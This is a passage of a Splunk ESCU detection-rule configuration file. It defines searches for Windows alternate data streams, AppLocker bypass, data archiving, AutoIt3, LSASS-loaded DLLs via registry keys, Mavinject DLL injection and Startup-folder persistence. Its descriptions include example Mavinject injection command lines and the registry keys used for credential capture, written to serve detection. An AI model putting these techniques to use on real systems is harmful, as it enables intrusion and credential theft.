action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Alternate DataStream - Base64 Content - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Defense Evasion Tactics"], "cis20": ["CIS 10"], "confidence": 80, "impact": 100, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1564", "T1564.004"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic leverages Sysmon Event ID 15, a critical file creation event, to detect the creation of Alternate Data Streams (ADS) on Windows systems. ADS is a feature of the NTFS file system that allows the storage of data in hidden streams attached to files. These streams are not visible in standard file listings, making them a popular technique for concealing malicious activity. Event ID 15 captures both the hash of the primary file content (unnamed stream) and the content of any additional named streams, which can include executables, scripts, or configuration data. Malware often exploits ADS to hide payloads, leveraging browser downloads to attach a Zone.Identifier stream, marking the file as originating from the Internet (Mark Of The Web, MOTW). This analytic is designed to identify such misuse by analyzing the content and creation patterns of named streams, including those under 1KB which may contain MOTW information. It is essential for detecting sophisticated threats that utilize non-executable file types or conceal malicious scripts within ADS, beyond the traditional focus on PE executables. The detection process involves monitoring for the creation of named streams, which are part of the NTFS structure and can be examined using tools like PowerShell for the presence of additional data streams or MOTW information. This approach helps in uncovering hidden payloads and tracking the origin of suspicious files downloaded via browsers or email clients, providing a comprehensive defense against ADS abuse. action.notable.param.rule_title = Windows Alternate DataStream - Base64 Content action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventCode=15 NOT Contents IN ("-","[ZoneTransfer]*") | regex TargetFilename="(? upperBound, "Yes", "No") | where anomaly="Yes" | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_applocker_execution_from_uncommon_locations_filter` [ESCU - Windows AppLocker Privilege Escalation via Unauthorized Bypass - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic utilizes Windows AppLocker event logs to identify attempts to bypass application restrictions. AppLocker is a feature that allows administrators to specify which applications are permitted to run on a system. This analytic is designed to identify attempts to bypass these restrictions, which could be indicative of an attacker attempting to escalate privileges. The analytic uses EventCodes 8007, 8004, 8022, 8025, 8029, and 8040 to identify these attempts. The analytic will identify the host, full file path, and target user associated with the bypass attempt. These EventCodes are related to block events and focus on 5 attempts or more. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic utilizes Windows AppLocker event logs to identify attempts to bypass application restrictions. AppLocker is a feature that allows administrators to specify which applications are permitted to run on a system. This analytic is designed to identify attempts to bypass these restrictions, which could be indicative of an attacker attempting to escalate privileges. The analytic uses EventCodes 8007, 8004, 8022, 8025, 8029, and 8040 to identify these attempts. The analytic will identify the host, full file path, and target user associated with the bypass attempt. These EventCodes are related to block events and focus on 5 attempts or more. action.escu.how_to_implement = The analytic is designed to be run against Windows AppLocker event logs collected from endpoints with AppLocker enabled. If using Microsoft Defender for Endpoint (MDE), modify the analytic to use EventTypes/ActionTypes that match the block events for AppLocker. The analytic requires the AppLocker event logs to be ingested into Splunk. action.escu.known_false_positives = False positives are possible if legitimate users are attempting to bypass application restrictions. This could occur if a user is attempting to run an application that is not permitted by AppLocker. It is recommended to investigate the context of the bypass attempt to determine if it is malicious or not. Modify the threshold as needed to reduce false positives. action.escu.creation_date = 2024-03-21 action.escu.modification_date = 2024-03-21 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows AppLocker Privilege Escalation via Unauthorized Bypass - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Windows AppLocker"] action.risk = 1 action.risk.param._risk_message = An attempt to bypass application restrictions was detected on a host $dest$. action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 64}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows AppLocker Privilege Escalation via Unauthorized Bypass - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows AppLocker"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic utilizes Windows AppLocker event logs to identify attempts to bypass application restrictions. AppLocker is a feature that allows administrators to specify which applications are permitted to run on a system. This analytic is designed to identify attempts to bypass these restrictions, which could be indicative of an attacker attempting to escalate privileges. The analytic uses EventCodes 8007, 8004, 8022, 8025, 8029, and 8040 to identify these attempts. The analytic will identify the host, full file path, and target user associated with the bypass attempt. These EventCodes are related to block events and focus on 5 attempts or more. action.notable.param.rule_title = Windows AppLocker Privilege Escalation via Unauthorized Bypass action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `applocker` EventCode IN (8007, 8004, 8022, 8025, 8029, 8040) | spath input=UserData_Xml | rename RuleAndFileData.* as *, Computer as dest, TargetUser AS user | lookup applockereventcodes EventCode OUTPUT Description | stats count AS attempt_count min(_time) as firstTime max(_time) as lastTime by dest, PolicyName, RuleId, user, TargetProcessId, FilePath, FullFilePath | where attempt_count > 5 | sort - attempt_count | `windows_applocker_privilege_escalation_via_unauthorized_bypass_filter` [ESCU - Windows AppLocker Rare Application Launch Detection - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is designed to detect the launch of applications that occur rarely within the environment, which could indicate the use of potentially malicious software or tools by attackers. It works by aggregating the count of application launches over time, then calculating the average and standard deviation of these counts. Applications whose launch counts significantly deviate from the norm, either by exceeding or falling below three standard deviations from the average, are flagged for further investigation. This approach helps in identifying unusual application activity that could be indicative of a security threat. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This analytic is designed to detect the launch of applications that occur rarely within the environment, which could indicate the use of potentially malicious software or tools by attackers. It works by aggregating the count of application launches over time, then calculating the average and standard deviation of these counts. Applications whose launch counts significantly deviate from the norm, either by exceeding or falling below three standard deviations from the average, are flagged for further investigation. This approach helps in identifying unusual application activity that could be indicative of a security threat. action.escu.how_to_implement = The analytic is designed to be run against Windows AppLocker event logs collected from endpoints with AppLocker enabled. If using Microsoft Defender for Endpoint (MDE), modify the analytic to use EventTypes/ActionTypes that match the block events for AppLocker. The analytic requires the AppLocker event logs to be ingested into Splunk. Note that, an additional method to reduce any false positives would be to add the specific EventCodes - 8003 or 8004 and filter from there. action.escu.known_false_positives = False positives are possible if legitimate users are launching applications that are not permitted by AppLocker. It is recommended to investigate the context of the application launch to determine if it is malicious or not. Modify the threshold as needed to reduce false positives. action.escu.creation_date = 2024-03-21 action.escu.modification_date = 2024-03-21 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows AppLocker Rare Application Launch Detection - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Windows AppLocker"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows AppLocker Rare Application Launch Detection - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows AppLocker"], "cis20": ["CIS 10"], "confidence": 30, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `applocker` | spath input=UserData_Xml | rename RuleAndFileData.* as *, Computer as dest, TargetUser AS user | stats dc(_time) as days, count by FullFilePath dest user | eventstats avg(count) as avg, stdev(count) as stdev | eval upperBound=(avg+stdev*3), lowerBound=(avg-stdev*3) | where count > upperBound OR count < lowerBound | `windows_applocker_rare_application_launch_detection_filter` [ESCU - Windows Archive Collected Data via Powershell - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies suspicious PowerShell script that archive files to a temp folder. This anomaly detection serves as a valuable indicator to uncover threats from adversaries utilizing PowerShell scripts for data archiving purposes. Identifying this method becomes pivotal in flagging and investigating potential threats, enabling proactive measures threat actors leveraging similar PowerShell-based data collection and archiving techniques. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1560"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies suspicious PowerShell script that archive files to a temp folder. This anomaly detection serves as a valuable indicator to uncover threats from adversaries utilizing PowerShell scripts for data archiving purposes. Identifying this method becomes pivotal in flagging and investigating potential threats, enabling proactive measures threat actors leveraging similar PowerShell-based data collection and archiving techniques. action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell. action.escu.known_false_positives = powershell may used this function to archive data. action.escu.creation_date = 2023-12-19 action.escu.modification_date = 2023-12-19 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Archive Collected Data via Powershell - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["CISA AA23-347A"] action.risk = 1 action.risk.param._risk_message = Windows Archive Collected Data via Powershell on $dest$. action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Archive Collected Data via Powershell - Rule action.correlationsearch.annotations = {"analytic_story": ["CISA AA23-347A"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1560"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 ScriptBlockText = "*Compress-Archive*" ScriptBlockText = "*\\Temp\\*" | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer UserID | rename Computer as dest | rename UserID as user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_archive_collected_data_via_powershell_filter` [ESCU - Windows Archive Collected Data via Rar - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies a process execute a rar utilities to archive files. This method has been exploited by various threat actors, including red-teamers and malware like DarkGate, to gather and compress collected data on compromised hosts. Subsequently, these archives are transmitted to command and control servers as part of their data exfiltration techniques. These adversaries leverage RAR archiving to consolidate and compress collected data on compromised hosts. Once the data is compiled into these archives, it serves as a means for these entities to effectively exfiltrate sensitive information. This process involves transferring the archived data to command and control servers, facilitating the extraction and retrieval of critical information from compromised systems. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1560.001", "T1560"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies a process execute a rar utilities to archive files. This method has been exploited by various threat actors, including red-teamers and malware like DarkGate, to gather and compress collected data on compromised hosts. Subsequently, these archives are transmitted to command and control servers as part of their data exfiltration techniques. These adversaries leverage RAR archiving to consolidate and compress collected data on compromised hosts. Once the data is compiled into these archives, it serves as a means for these entities to effectively exfiltrate sensitive information. This process involves transferring the archived data to command and control servers, facilitating the extraction and retrieval of critical information from compromised systems. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = user and network administrator can execute this command. action.escu.creation_date = 2023-11-23 action.escu.modification_date = 2023-11-23 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Archive Collected Data via Rar - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["DarkGate Malware"] action.risk = 1 action.risk.param._risk_message = a Rar.exe commandline used in archiving collected data in $dest$. action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Archive Collected Data via Rar - Rule action.correlationsearch.annotations = {"analytic_story": ["DarkGate Malware"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1560.001", "T1560"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name="Rar.exe" OR Processes.original_file_name = "Rar.exe" AND Processes.process = "*a*" Processes.process = "* -ep1*" Processes.process = "* -r*" Processes.process = "* -y*" Processes.process = "* -v5m*" Processes.process = "* -m1*" by Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.process_guid Processes.parent_process_name Processes.parent_process Processes.parent_process_guid Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_archive_collected_data_via_rar_filter` [ESCU - Windows AutoIt3 Execution - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic is designed to detect any execution of AutoIt3, a scripting language designed for automating the Windows GUI and general scripting. This includes instances where AutoIt3 has been renamed or otherwise altered in an attempt to evade detection. The analytic works by searching for process names or original file names that match 'autoit3.exe', which is the default executable for AutoIt scripts. This detection is important as AutoIt3 is often used by attackers to automate malicious activities, such as the execution of malware or other unwanted software. False positives may occur with legitimate uses of AutoIt3. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic is designed to detect any execution of AutoIt3, a scripting language designed for automating the Windows GUI and general scripting. This includes instances where AutoIt3 has been renamed or otherwise altered in an attempt to evade detection. The analytic works by searching for process names or original file names that match 'autoit3.exe', which is the default executable for AutoIt scripts. This detection is important as AutoIt3 is often used by attackers to automate malicious activities, such as the execution of malware or other unwanted software. False positives may occur with legitimate uses of AutoIt3. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives may be present if the application is legitimately used, filter by user or endpoint as needed. action.escu.creation_date = 2023-10-31 action.escu.modification_date = 2023-10-31 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows AutoIt3 Execution - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["DarkGate Malware"] action.risk = 1 action.risk.param._risk_message = Execution of AutoIt3 detected. The source process is $parent_process_name$ and the destination process is $process_name$ on $dest$ by action.risk.param._risk = [{"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 50}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 50}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 50}, {"risk_object_field": "user", "risk_object_type": "other", "risk_score": 50}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows AutoIt3 Execution - Rule action.correlationsearch.annotations = {"analytic_story": ["DarkGate Malware"], "cis20": ["CIS 10"], "confidence": 100, "impact": 50, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic is designed to detect any execution of AutoIt3, a scripting language designed for automating the Windows GUI and general scripting. This includes instances where AutoIt3 has been renamed or otherwise altered in an attempt to evade detection. The analytic works by searching for process names or original file names that match 'autoit3.exe', which is the default executable for AutoIt scripts. This detection is important as AutoIt3 is often used by attackers to automate malicious activities, such as the execution of malware or other unwanted software. False positives may occur with legitimate uses of AutoIt3. action.notable.param.rule_title = Windows AutoIt3 Execution action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name IN ("autoit3.exe", "autoit*.exe") OR Processes.original_file_name IN ("autoit3.exe", "autoit*.exe") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_autoit3_execution_filter` [ESCU - Windows Autostart Execution LSASS Driver Registry Modification - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the abuse of two undocumented registry keys that allow for a DLL to load into lsass.exe to potentially capture credentials. Upon successful modification of \CurrentControlSet\Services\NTDS\DirectoryServiceExtPt or \CurrentControlSet\Services\NTDS\LsaDbExtPt, a DLL either remote or local will be set as the value and load up into lsass.exe. Based on POC code a text file may be written to disk with credentials. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1547.008"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies the abuse of two undocumented registry keys that allow for a DLL to load into lsass.exe to potentially capture credentials. Upon successful modification of \CurrentControlSet\Services\NTDS\DirectoryServiceExtPt or \CurrentControlSet\Services\NTDS\LsaDbExtPt, a DLL either remote or local will be set as the value and load up into lsass.exe. Based on POC code a text file may be written to disk with credentials. action.escu.how_to_implement = To successfully implement this search you need to be ingesting information on process that include the name of the process responsible for the changes from your endpoints into the `Endpoint` datamodel in the `Registry` node. In addition, confirm the latest CIM App 4.20 or higher is installed and the latest TA for the endpoint product. action.escu.known_false_positives = False positives may be present on recent Windows Operating Systems. Filtering may be required based on process_name. In addition, look for non-standard, unsigned, module loads into LSASS. If query is too noisy, modify by adding Endpoint.processes process_name to query to identify the process making the modification. action.escu.creation_date = 2022-08-22 action.escu.modification_date = 2022-08-22 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Autostart Execution LSASS Driver Registry Modification - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Windows Registry Abuse"] action.risk = 1 action.risk.param._risk_message = The registry values for DirectoryServiceExtPt or LsaDbExtPt were modified on $dest$. action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Autostart Execution LSASS Driver Registry Modification - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Registry Abuse"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1547.008"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies the abuse of two undocumented registry keys that allow for a DLL to load into lsass.exe to potentially capture credentials. Upon successful modification of \CurrentControlSet\Services\NTDS\DirectoryServiceExtPt or \CurrentControlSet\Services\NTDS\LsaDbExtPt, a DLL either remote or local will be set as the value and load up into lsass.exe. Based on POC code a text file may be written to disk with credentials. action.notable.param.rule_title = Windows Autostart Execution LSASS Driver Registry Modification action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Registry where Registry.registry_path IN ("*\\CurrentControlSet\\Services\\NTDS\\DirectoryServiceExtPt","*\\CurrentControlSet\\Services\\NTDS\\LsaDbExtPt") by Registry.registry_key_name Registry.user Registry.registry_path Registry.registry_value_data Registry.action Registry.dest Registry.process_guid | `drop_dm_object_name(Registry)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_autostart_execution_lsass_driver_registry_modification_filter` [ESCU - Windows Binary Proxy Execution Mavinject DLL Injection - Rule] action.escu = 0 action.escu.enabled = 1 description = Adversaries may abuse mavinject.exe to inject malicious DLLs into running processes (i.e. Dynamic-link Library Injection), allowing for arbitrary code execution (ex. C:\Windows\system32\mavinject.exe PID /INJECTRUNNING PATH_DLL). In addition to Dynamic-link Library Injection, Mavinject.exe can also be abused to perform import descriptor injection via its /HMODULE command-line parameter (ex. mavinject.exe PID /HMODULE=BASE_ADDRESS PATH_DLL ORDINAL_NUMBER). This command would inject an import table entry consisting of the specified DLL into the module at the given base address. During triage, review file modifcations and parallel processes. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218.013", "T1218"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = Adversaries may abuse mavinject.exe to inject malicious DLLs into running processes (i.e. Dynamic-link Library Injection), allowing for arbitrary code execution (ex. C:\Windows\system32\mavinject.exe PID /INJECTRUNNING PATH_DLL). In addition to Dynamic-link Library Injection, Mavinject.exe can also be abused to perform import descriptor injection via its /HMODULE command-line parameter (ex. mavinject.exe PID /HMODULE=BASE_ADDRESS PATH_DLL ORDINAL_NUMBER). This command would inject an import table entry consisting of the specified DLL into the module at the given base address. During triage, review file modifcations and parallel processes. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives may be present, filter on DLL name or parent process. action.escu.creation_date = 2022-07-07 action.escu.modification_date = 2022-07-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Binary Proxy Execution Mavinject DLL Injection - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Living Off The Land"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ attempting load a DLL. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 49}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 49}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 49}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Binary Proxy Execution Mavinject DLL Injection - Rule action.correlationsearch.annotations = {"analytic_story": ["Living Off The Land"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218.013", "T1218"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = Adversaries may abuse mavinject.exe to inject malicious DLLs into running processes (i.e. Dynamic-link Library Injection), allowing for arbitrary code execution (ex. C:\Windows\system32\mavinject.exe PID /INJECTRUNNING PATH_DLL). In addition to Dynamic-link Library Injection, Mavinject.exe can also be abused to perform import descriptor injection via its /HMODULE command-line parameter (ex. mavinject.exe PID /HMODULE=BASE_ADDRESS PATH_DLL ORDINAL_NUMBER). This command would inject an import table entry consisting of the specified DLL into the module at the given base address. During triage, review file modifcations and parallel processes. action.notable.param.rule_title = Windows Binary Proxy Execution Mavinject DLL Injection action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=mavinject.exe Processes.process IN ("*injectrunning*", "*hmodule=0x*") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_binary_proxy_execution_mavinject_dll_injection_filter` [ESCU - Windows Boot or Logon Autostart Execution In Startup Folder - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic will identify suspicious files dropped or created in the Windows %startup% folder. This technique is a common way to gain persistence on a targeted host. Threat actor, adversaries and red teamer abuse this folder path to automatically execute their malicious sample upon boot or restart of the infected host. This TTP detection is a good indicator that a suspicious process wants to gain persistence on the targeted host. We suggest to verify the process name by using the process guid field, the file created and also the user and the computer name for further investigation. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1547.001", "T1547"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic will identify suspicious files dropped or created in the Windows %startup% folder. This technique is a common way to gain persistence on a targeted host. Threat actor, adversaries and red teamer abuse this folder path to automatically execute their malicious sample upon boot or restart of the infected host. This TTP detection is a good indicator that a suspicious process wants to gain persistence on the targeted host. We suggest to verify the process name by using the process guid field, the file created and also the user and the computer name for further investigation. action.escu.how_to_implement = To successfully implement this search you need to be ingesting information on process that include the name of the Filesystem responsible for the changes from your endpoints into the `Endpoint` datamodel in the `Filesystem` node. action.escu.known_false_positives = Administrators may allow creation of script or exe in this path. action.escu.creation_date = 2023-01-12 action.escu.modification_date = 2023-01-12 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Boot or Logon Autostart Execution In Startup Folder - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Chaos Ransomware", "NjRAT", "RedLine Stealer"] action.risk = 1 action.risk.param._risk_message = a process dropped a file in %startup% folder in $dest$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 81}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 81}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Boot or Logon Autostart Execution In Startup Folder - Rule action.correlationsearch.annotations = {"analytic_story": ["Chaos Ransomware", "NjRAT", "RedLine Stealer"], "cis20": ["CIS 10"], "confidence": 90, "impact": 90, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1547.001", "T1547"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = |tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Filesystem where Filesystem.file_path = 